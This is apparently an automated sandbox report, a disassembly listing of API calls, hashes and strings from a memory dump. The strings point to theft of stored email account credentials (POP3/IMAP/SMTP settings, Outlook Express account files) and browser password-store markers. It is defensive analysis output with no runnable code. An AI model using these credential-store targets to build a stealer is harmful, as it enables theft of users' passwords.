                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 1999381814-0
                                                                                            • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                            • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                            • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                            • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                            • API String ID: 1297977491-3883738016
                                                                                            • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                            • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                            • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                            • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                              • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                              • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                                                                              • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                                                                            • memcpy.MSVCRT ref: 0044972E
                                                                                            • memcpy.MSVCRT ref: 0044977B
                                                                                            • memcpy.MSVCRT ref: 004497F6
                                                                                              • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                                                                              • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                                                                            • memcpy.MSVCRT ref: 00449846
                                                                                            • memcpy.MSVCRT ref: 00449887
                                                                                            • memcpy.MSVCRT ref: 004498B8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: gj
                                                                                            • API String ID: 438689982-4203073231
                                                                                            • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                            • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                            • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                            • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm$__aullrem
                                                                                            • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                            • API String ID: 643879872-978417875
                                                                                            • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                            • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                            • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                            • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                            • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                            • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                            • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                            • memset.MSVCRT ref: 004058C3
                                                                                            • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                            • SetFocus.USER32(?), ref: 00405976
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$FocusItemmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4281309102-0
                                                                                            • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                            • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                            • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                            • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                            • _mbscat.MSVCRT ref: 0040A8FF
                                                                                            • sprintf.MSVCRT ref: 0040A921
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite_mbscatsprintfstrlen
                                                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                            • API String ID: 1631269929-4153097237
                                                                                            • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                            • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                            • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                            • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040810E
                                                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
                                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                            • API String ID: 524865279-2190619648
                                                                                            • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                            • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                            • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                            • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                            • String ID: 0$6
                                                                                            • API String ID: 2300387033-3849865405
                                                                                            • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                            • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                            • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                            • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpystrlen$memsetsprintf
                                                                                            • String ID: %s (%s)
                                                                                            • API String ID: 3756086014-1363028141
                                                                                            • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                            • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                            • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                            • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscat$memsetsprintf
                                                                                            • String ID: %2.2X
                                                                                            • API String ID: 125969286-791839006
                                                                                            • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                            • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                            • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                            • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                            • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                              • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                              • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                              • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                              • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                              • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                                                                              • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                                                                            • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                            • String ID: ACD
                                                                                            • API String ID: 1886237854-620537770
                                                                                            • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                                                            • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                            • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                                                            • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004091EC
                                                                                            • sprintf.MSVCRT ref: 00409201
                                                                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                                                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                            • String ID: caption$dialog_%d
                                                                                            • API String ID: 2923679083-4161923789
                                                                                            • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                            • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                            • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                            • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                            • memset.MSVCRT ref: 00410246
                                                                                            • memset.MSVCRT ref: 00410258
                                                                                              • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                                                                            • memset.MSVCRT ref: 0041033F
                                                                                            • _mbscpy.MSVCRT ref: 00410364
                                                                                            • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3974772901-0
                                                                                            • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                            • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                            • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                            • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0044406C
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                            • strlen.MSVCRT ref: 004440D1
                                                                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                            • memcpy.MSVCRT ref: 004440EB
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 577244452-0
                                                                                            • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                                                            • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                            • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                                                            • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                            • _strcmpi.MSVCRT ref: 00404518
                                                                                            • _strcmpi.MSVCRT ref: 00404536
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strcmpi$memcpystrlen
                                                                                            • String ID: imap$pop3$smtp
                                                                                            • API String ID: 2025310588-821077329
                                                                                            • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                            • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                            • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                            • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040C02D
                                                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                                                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                            • API String ID: 2726666094-3614832568
                                                                                            • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                            • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                            • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                            • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2014771361-0
                                                                                            • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                            • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                            • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                            • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memcmp.MSVCRT ref: 00406151
                                                                                              • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                                                                            • memcmp.MSVCRT ref: 0040617C
                                                                                            • memcmp.MSVCRT ref: 004061A4
                                                                                            • memcpy.MSVCRT ref: 004061C1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$memcpy
                                                                                            • String ID: global-salt$password-check
                                                                                            • API String ID: 231171946-3927197501
                                                                                            • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                            • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                            • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                            • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                                                            • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                            • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                                                            • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                            • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                            • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                            • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                            • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                            • EndPaint.USER32(?,?), ref: 004016F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                            • String ID:
                                                                                            • API String ID: 19018683-0
                                                                                            • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                            • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                            • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                            • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040644F
                                                                                            • memcpy.MSVCRT ref: 00406462
